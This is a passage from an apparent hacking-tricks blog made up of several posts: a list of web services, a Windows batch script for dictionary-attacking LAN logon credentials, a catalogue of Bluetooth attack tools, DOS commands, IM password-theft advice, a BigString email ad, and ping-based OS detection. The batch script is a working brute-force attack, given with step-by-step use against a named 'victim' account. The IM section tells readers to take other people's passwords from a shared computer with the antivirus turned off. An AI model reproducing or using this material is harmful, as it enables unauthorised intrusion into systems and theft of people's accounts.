    30. Nanoscan - Super fast yet compehensive online virus scanner.
    31. OhDon’tForget - It does only one thing, but does it really well: Schedule text message reminders to any phone.
    32. ProQuo - Reduce junk mail by removing your personal data from telemarketing lists.
    33. PPCalc - Comprehensive Paypal fees calculator.
    34. Rondee - Fast, easy and free way to arrange phone conference calls with as many people as you want.
    35. SpokenText - Convert PDF, Word, plain text, PowerPoint files, ,RSS news feeds, emails and web pages to speech.
    36. Sullr - Obtain information about telephone lines in reverse mode. Get address, location, owner’s name etc.
    37. WakerUpper - Schedule wake-up phone calls. Lots of useful features.
    38. WebMarkers - Adds additional option to your ‘Print’ menu that lets you print documents (or webpages) directly to the web.
    39. WhatShouldIReadNext - Book recommendation service. Simply enter the author and title of your latest book and it will give you a list of recommended readings.
    40. WorldTaxiMeter - Calculate the cost of a taxi ride in a number of top cities worldwide (London, New York, Rome …). Accessible both from the web and mobile phone

    LAN Remote user - Dictionary Attack (hack any system in lan)

    Create and use this Batch file to launch a Dictionary attack and find the Windows logon Credentials in a LAN.
    You need a Dictionary text file to proceed further to launch this attack successfully.

    Just Follow the steps below,
    1. Open up a Notepad file.
    2. Copy and paste the below code and save it as a Batch file with .bat extension.

    @echo off
    if “%1″==”" goto fin
    if “%2″==”" goto fin
    del logfile.txt
    FOR /F “tokens=1″ %%i in (passlist.txt) do ^
    echo %%i && ^
    net use \\%1\ipc$ %%i /u:%1\%2 2>>logfile.txt && ^
    echo %time% %date% >> output.txt && ^
    echo \\%1\ipc$ acct: %2 pass: %%i >> output.txt && goto end
    :fin
    echo *****Done*****

    3. Make sure that you have a Dictionary password Text file in the same location where you are going to execute this program. ( Name should be passlist.txt )
    4. Now goto the command prompt and then execute this program from there, along with the Target compters IP address or Hostname and the Valid Username.

    The Syntax should be like this,…
    C:\>LANbrute.bat 192.169.21.02 Administrator

    Where,
    LANbrute.bat - This is the Name of the batch file that resides in the C Drive.
    192.169.21.02 - IP Address of the Target Computer.
    Administrator - Victim Account that you want to crack.
    5. This program will start launching Dictionary Attack against the Adminstrator account on the Mahine 192.168.21.02, by using the passwords from the file passlist.txt and will not stop until it finds a right match.
    6. If the right password was found, then it will save it in a text file named ‘output.txt’ on the same directory.
    //Disclaimer : This is only meant for Educational Means, The members of this site is not responsible for whatever you do with this. //

    Mobile Hacking by bluetooth

    Bluetooth technology is great, No doubt. It provides an easy way for a wide range of mobile devices to communicate with each other without the need for cables or wires. However, despite its obvious benefits, it can also be a potential threat for the privacy and security of Bluetooth users.
    If you are planning to gain a deeper understanding of Bluetooth security, you will need a good set of tools with which to work. By familiarizing yourself with the following tools, you will not only gain a knowledge of the vulnerabilities inherent in Bluetooth-enabled devices, but you will also get a glimpse at how an attacker might exploit them.
    This hack highlights the essential tools, mostly for the Linux platform, that can be used to search out and hack Bluetooth-enabled devices.
    Discovering Bluetooth Devices
    BlueScanner - BlueScanner searches out for Bluetooth-enabled devices. It will try to extract as much information as possible for each newly discovered device.
    BlueSniff - BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices.
    BTBrowser - Bluetooth Browser is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth-enabled devices. You can browse device information and all supported profiles and service records of each device. BTBrowser works on phones that supports JSR-82 - the Java Bluetooth specification.
    BTCrawler -BTCrawler is a scanner for Windows based devices. It scans for other devices in range and performs service query. It implements the BlueJacking and BlueSnarfing attacks.
    Hacking Bluetooth Devices
    BlueBugger -BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain an unauthorized access to the phone-book, calls lists and other private information.
    CIHWB - Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Currently it only support some Bluetooth exploits and tools like BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack.
    Bluediving - Bluediving is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, has features such as Bluetooth address spoofing, an AT and a RFCOMM socket shell and implements tools like carwhisperer, bss, L2CAP packetgenerator, L2CAP connection resetter, RFCOMM scanner and greenplaque scanning mode.
    Transient Bluetooth Environment Auditor - T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools.
    Bluesnarfer - Bluesnarfer will download the phone-book of any mobile device vulnerable to Bluesnarfing. Bluesnarfing is a serious security flow discovered in several Bluetooth-enabled mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner, and gain access to restricted portions of the stored data.
    BTcrack - BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges.
    Blooover II - Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable.
    BlueTest - BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices.
    BTAudit - BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices.

    List of MS-DOS commands for hacking and its defence


    there’s no replacement for the *nix shell for network based computing tasks, but Micro$oft still has its roots deep . For those who find working via the GUI meclancholy, here’s a list of DOS commands you might want to try out on your Windows machine. This can be useful for hackers, or anyone interested in churning out more information from the network.
    ADDUSERS Helps Add or list users to/from a CSV file
    ARP Address Resolution Protocol
    ASSOC Change file extension associations
    ASSOCIAT One step file association
    AT Schedule a command to run at a later time
    ATTRIB Change file attributes
    BOOTCFG Edit Windows boot settings
    BROWSTAT Get domain, browser and PDC info
    CACLS Change file permissions
    CALL Call one batch program from another
    CD Change Directory - move to a specific Folder
    CHANGE Change Terminal Server Session properties
    CHKDSK Check Disk - check and repair disk problems
    CHKNTFS Check the NTFS file system
    CHOICE Accept keyboard input to a batch file
    CIPHER Encrypt or Decrypt files/folders *
    CleanMgr Automated cleanup of Temp files, recycle bin
    CLEARMEM Clear memory leaks
    CLIP Copy STDIN to the Windows clipboard.
    CLS Clear the screen
    CLUSTER Windows Clustering
    CMD Start a new CMD shell
    COLOR Change colors of the CMD window
    COMP Compare the contents of two files or sets of files
    COMPACT Compress files or folders on an NTFS partition
    COMPRESS Compress individual files on an NTFS partition
    CON2PRT Connect or disconnect a Printer
    CONVERT Convert a FAT drive to NTFS.
    COPY Copy one or more files to another location
    CSVDE Import or Export Active Directory data
    DATE Display or set the date
    Dcomcnfg DCOM Configuration Utility
    DEFRAG Defragment hard drive
    DEL Delete one or more files
    DELPROF Delete NT user profiles
    DELTREE Delete a folder and all subfolders
    DevCon Device Manager Command Line Utility
    DIR Display a list of files and folders
    DIRUSE Display disk usage
    DISKCOMP Compare the contents of two floppy disks
    DISKCOPY Copy the contents of one floppy disk to another
    DNSSTAT DNS Statistics
    DOSKEY Edit command line, recall commands, and create macros
    DSADD Add user (computer, group..) to active directory
    DSQUERY List items in active directory
    DSMOD Modify user (computer, group..) in active directory
    ECHO Display message on screen
    ENDLOCAL End localisation of environment changes in a batch file
    ERASE Delete one or more files
    EXIT Quit the CMD shell
    EXPAND Uncompress files
    EXTRACT Uncompress CAB files
    FC Compare two files
    FDISK Disk Format and partition
    FIND Search for a text string in a file
    FINDSTR Search for strings in files
    FOR Loop command: all options Files, Directory, List
    FORFILES Batch process multiple files
    FORMAT Format a disk
    FREEDISK Check free disk space (in bytes)
    FSUTIL File and Volume utilities
    FTP File Transfer Protocol
    FTYPE Display or modify file types used in file extension associations
    GLOBAL Display membership of global groups
    GOTO Direct a batch program to jump to a labelled line
    HELP Online Help
    HFNETCHK Network Security Hotfix Checker
    IF Conditionally perform a command
    IFMEMBER Is the current user in an NT Workgroup
    IPCONFIG Configure IP
    KILL Remove a program from memory
    LABEL Edit a disk label
    LOCAL Display membership of local groups
    LOGEVENT Write text to the NT event viewer.
    LOGOFF Log a user off
    LOGTIME Log the date and time in a file
    MEM Display memory usage
    MD Create new folders
    MODE Configure a system device
    MORE Display output, one screen at a time
    MOUNTVOL Manage a volume mount point
    MOVE Move files from one folder to another
    MOVEUSER Move a user from one domain to another
    MSG Send a message
    MSIEXEC Microsoft Windows Installer
    MSINFO Windows NT diagnostics
    MSTSC Terminal Server Connection (Remote Desktop Protocol)
    MUNGE Find and Replace text within file(s)
    MV Copy in-use files
    NET Manage network resources
    NETDOM Domain Manager
    NETSH Configure network protocols
    NETSVC Command-line Service Controller
    NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
    NETSTAT Display networking statistics (TCP/IP)
    NOW Display the current Date and Time
    NSLOOKUP Name server lookup
    NTBACKUP Backup folders to tape
    NTRIGHTS Edit user account rights
    PATH Display or set a search path for executable files
    PATHPING Trace route plus network latency and packet loss
    PAUSE Suspend processing of a batch file and display a message
    PERMS Show permissions for a user
    PERFMON Performance Monitor
    PING Test a network connection
    POPD Restore the previous value of the current directory saved by PUSHD
    PORTQRY Display the status of ports and services
    PRINT Print a text file
    PRNCNFG Display, configure or rename a printer
    PRNMNGR Add, delete, list printers set the default printer
    PROMPT Change the command prompt
    PsExec Execute process remotely
    PsFile Show files opened remotely
    PsGetSid Display the SID of a computer or a user
    PsInfo List information about a system
    PsKill Kill processes by name or process ID
    PsList List detailed information about processes
    PsLoggedOn Who’s logged on (locally or via resource sharing)
    PsLogList Event log records
    PsPasswd Change account password
    PsService View and control services
    PsShutdown Shutdown or reboot a computer
    PsSuspend Suspend processes
    PUSHD Save and then change the current directory
    QGREP Search file(s) for lines that match a given pattern.
    RASDIAL Manage RAS connections
    RASPHONE Manage RAS connections
    RECOVER Recover a damaged file from a defective disk.
    REG Read, Set or Delete registry keys and values
    REGEDIT Import or export registry settings
    REGSVR32 Register or unregister a DLL
    REGINI Change Registry Permissions
    REM Record comments (remarks) in a batch file
    REN Rename a file or files.
    REPLACE Replace or update one file with another
    RD Delete folder(s)
    RDISK Create a Recovery Disk
    RMTSHARE Share a folder or a printer
    ROBOCOPY Robust File and Folder Copy
    ROUTE Manipulate network routing tables
    RUNAS Execute a program under a different user account
    RUNDLL32 Run a DLL command (add/remove print connections)
    SC Service Control
    SCHTASKS Create or Edit Scheduled Tasks
    SCLIST Display NT Services
    ScriptIt Control GUI applications
    SET Display, set, or remove environment variables
    SETLOCAL Control the visibility of environment variables
    SETX Set environment variables permanently
    SHARE List or edit a file share or print share
    SHIFT Shift the position of replaceable parameters in a batch file
    SHORTCUT Create a windows shortcut (.LNK file)
    SHOWGRPS List the NT Workgroups a user has joined
    SHOWMBRS List the Users who are members of a Workgroup
    SHUTDOWN Shutdown the computer
    SLEEP Wait for x seconds
    SOON Schedule a command to run in the near future
    SORT Sort input
    START Start a separate window to run a specified program or command
    SU Switch User
    SUBINACL Edit file and folder Permissions, Ownership and Domain
    SUBST Associate a path with a drive letter
    SYSTEMINFO List system configuration
    TASKLIST List running applications and services
    TIME Display or set the system time
    TIMEOUT Delay processing of a batch file
    TITLE Set the window title for a CMD.EXE session
    TOUCH Change file timestamps
    TRACERT Trace route to a remote host
    TREE Graphical display of folder structure
    TYPE Display the contents of a text file
    USRSTAT List domain usernames and last login
    VER Display version information
    VERIFY Verify that files have been saved
    VOL Display a disk label
    WHERE Locate and display files in a directory tree
    WHOAMI Output the current UserName and domain
    WINDIFF Compare the contents of two files or sets of files
    WINMSD Windows system diagnostics
    WINMSDP Windows system diagnostics II
    WMIC WMI Commands
    XCACLS Change file permissions
    XCOPY Copy files and folders
    This list is not exhaustive . Most commands will work well, however please don’t fume up as some of these might not work on your machine due to version dependencies

    Learn how to hack Yahoo/MSN/AOL/Google

    This is not actually hacking but recovering passwords .You can recover password oF Yahoo, Msn, Hotmal, Live, Google, Gmail, Aol, Aim, ICQ and a lot more Think a bit if you main motive is to get password anyway.

    Now there are a bit of requirements

    First you victim must have used a IM(instant messenger) at least once with this id. Say for yahoo he must use yahoo messenger.Online versions dont count.So this means you cannot hack accounts of say facebook or myspace which dont have their IM

    Second you must have access to his comp where he has used the IM.

    Third he must not have formatted his system recently or he must have used the IM after format.

    These requirements are tough, i know.You will hit a jackpot if you are on shared comp as it's not frequently formatted and many use IM.You can even ask him to use the IM on your comp.Once you fullfill these job's almost done.

    Now you can use these password recovery software to get hold of your victims password These softwares have high success rate but not 100%. I am giving all trial download links .If you want the full version visit your fav torrent or rapidshare or megaupload.The will not crack any passwords greater than 4 chars which mean syou cant hack most accounts as they require atleast 6 chars.

    You will have to temporarily stop the Antivirus as your antivirus will detect it as spyware. But they are Spyware free !00% safe

    • MessenPass 1.16

    • Instant Messengers Password Recovery Master

    • Advanced Instant Messengers Password Recovery 3.4

    Please you them sensibly . Use this only to get lost passwords of your account. If you hack some one's account we wont take responsibility

    Send Email in Mission Impossible Style


    You might remember the world famous scene of Mission Impossible in which after the message has been heard once the message destroys itself. Now it is possible for everybody to have such facility. You can send an E-mail which destroys itself after it has been read once.

    Every time that you send an email, copies are stored permanently on multiple email servers as well as the recipient's inbox and anyone they decide to send it to. Your emails can be stored and scanned in more places than you can imagine. Do you want people storing your email messages forever? Do you want something that you type today to be used against you tomorrow, next week, next month or even in the next decade?

    Until now, everyone else has had control of the email that you have sent. BigString gives you back control of your email, acting like an automatic shredder for your email. You can self-destruct or change an email that's already been sent or read. Don't leave your messages sitting in peoples' inboxes forever. Get a free BigString email account to protect your privacy.

    BigString takes the risk out of email

    Now, with BigString, you can finally take the risk out of email and put an end to "sender regret." It is the world's first & only email service that thoroughly protects your safety and privacy.

    BigString's exclusive, patent-pending technology enables you to prevent your personal or business information from lingering indefinitely in someone else's inbox. It also restricts private pictures or messages from being indiscriminately spread throughout cyberspace! Now your sensitive photos can't be posted to unseemly web sites or printed for circulation amongst total strangers.

    BigString lets you have second thoughts

    BigString shifts the control from the recipient to YOU the sender. BigString grants the luxury of second thoughts, the power to limit message viewings, and the choice to delay email transmission.

    You can reword a message fired off in anger or haste or completely delete it! You can recall a botched résumé for revision or erase a tasteless joke. You can make a work of art or photograph print-proof. You can prevent a love letter from being forwarded. You can set an expiration date on an emailed price quote or business offer or you can simply pull back an email to eliminate typos.

    BigString takes the danger out of clicking

    BigString guarantees that clicking "send" will never again be an irreversible disaster. Now YOU decide the fate of your emails. You decide where they end up, who sees them and for how long. BigString emails can be destroyed, recalled or changed even after they've been opened! The freedom is yours, the options are yours, and you're the boss with BigString.

    BigString is easy to use

    BigString is as easy to use as any other email and there's nothing to download! Don't be resigned to the mercy of your recipient. You don't want your every action to be carved in stone because sometimes you just NEED to take it back!

    Here are just a few of the many applications of BigString Erasable, Recallable, Non-Printable Email.

    Executives: Protect your business and safeguard your email. Now you never have to worry about sending the wrong attachment or completely forgetting it. Misspelled words, incorrect dates, or other typos can all be fixed even after your message has been sent. You can even "pull an email back" to delete expired price quotes, old business offers or dated legal material. BigString is your email insurance.

    On-Line Daters: You don't want your personal information like pictures, phone numbers or intimate notes, circulated around the Internet! BigString prevents your pictures and messages from being printed or forwarded. You can set an expiration date for an email or self-destruct it at will. You can choose the number of times you'll allow a picture to be viewed before it disappears. BigString protects your privacy!

    Artists and Photographers: Now with BigString you can confidently email proofs and samples without the slightest fear that they will be printed or saved for later use without your authorization. Use BigString to make your image non-savable and non-printable! Limit the number of times a client can view a piece before you have it self-destruct. You can even recall a sent email to delete an old price quote or alter a new one. You can also prevent it from being forwarded to other customers. BigString protects your rights of ownership!

    Copywriters: Spelling or punctuation errors that can cost time, money, or embarrassment are now a thing of the past. With BigString, clicking "send" is no longer an action "carved in stone." Accidentally arranging paragraphs in the wrong order will no longer mean a lost account. With the technology of BigString you can recall that mistake-ridden copy and correct the errors even after your email has left the outbox. You can self-destruct what you sent all together and replace it with a fully revised version. Only you will know this switch has occurred! With BigString you can confidently send non-printable, non-savable sample copy. You no longer have to worry that it will be used without your knowledge. You're the boss with BigString.

    Remote Operating System Detection

    Now a days we invite the so called victim to a webpage/blog and with the help of a free web traker servive get all his details as in browser/operating system and other details but still i would like to share the traditional method as well.

    Detecting OS (operating system) is another most important step towards hacking into a system. We can even say that after tracing the IP of the system it is the most prior thing that should be done to get the root on a system cause without having knowledge about the OS running by the target system you cannot execute any system commands on the target system and thus your mission wont be accomplished. In here I have figure out the basics of detecting OS remotely without having physical access to the system. There are various method of detecting OS like by trace routing the victim’s IP , by pinging the IP , by using telnet and also by using a terminal. But from my research I have concluded that detecting OS through ping or tracerout is the most simplest but effective way of determining the operating system running in the remote computer without having physical access to the system. Since my aim of writing articles is to make things clear for beginners and intermediate so I will explain remote os detecting through ping method which is very easy to understand even for peoples totally new to computers.. yeah yeah.. I know you call them newbies..right ?

    REMOTE OS DETECTION USING PING METHOD

    What is PING and what is its utility ?

    Ping is an MSDOS utility provided for windows version of DOS and for Unix and operating systems having UNIX as the core kernel. It runs in dos box in windows and directly in UNIX platform. In this manual I will give more stress on the MSDOS version of ping.

    Ping is an utility used for sending and receiving packets of data to a target system using its IP and thus from the outputs you can figure out many information about the target system.
    In remote os detection we are mainly concerned with the TTL values of the received data packets.

    Note: When you send or receive a file over the internet it is not send at once. Instead it is broken down at the source system and these broken fragments of data know as data packets are send through the internet and these data packets are gathered together by the target system according to an algorithm constructed by the source system.
    For example if I send a picture of size 400 KB to my girl friend (hey girls out there remember I don’t yet have a gf in reality) then what actually happens is that my system breaks the data into data packets, say the file of 400 KB has been broken down into 4 data packets each having a size of 100 KB and having a name. These data packets are assigned a code known as the TTL value of the data packets by my operating system. Then these data packets are gathered and the original file is formed from these data packets at the target system.

    Example:

    C:\windows>ping/?

    Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
    [-r count] [-s count] [[-j host-list] | [-k host-list]]
    [-w timeout] target_name

    Options:
    -t Ping the specified host until stopped.
    To see statistics and continue - type Control-Break;
    -a Resolve addresses to hostnames.
    -n count Number of echo requests to send.
    -l size Send buffer size.
    -f Set Don’t Fragment flag in packet.
    -i TTL Time To Live.
    -v TOS Type Of Service.
    -r count Record route for count hops.
    -s count Timestamp for count hops.
    -j host-list Loose source route along host-list.
    -k host-list Strict source route along host-list.
    -w timeout Timeout in milliseconds to wait for each reply.

    Search This Blog

     
    Home | Gallery | Tutorials | Freebies | About Us | Contact Us

    Copyright © 2009 Koushik Hacking Tricks |Designed by Templatemo |Converted to blogger by BloggerThemes.Net

    Usage Rights

    DesignBlog BloggerTheme comes under a Creative Commons License.This template is free of charge to create a personal blog.You can make changes to the templates to suit your needs.But You must keep the footer links Intact.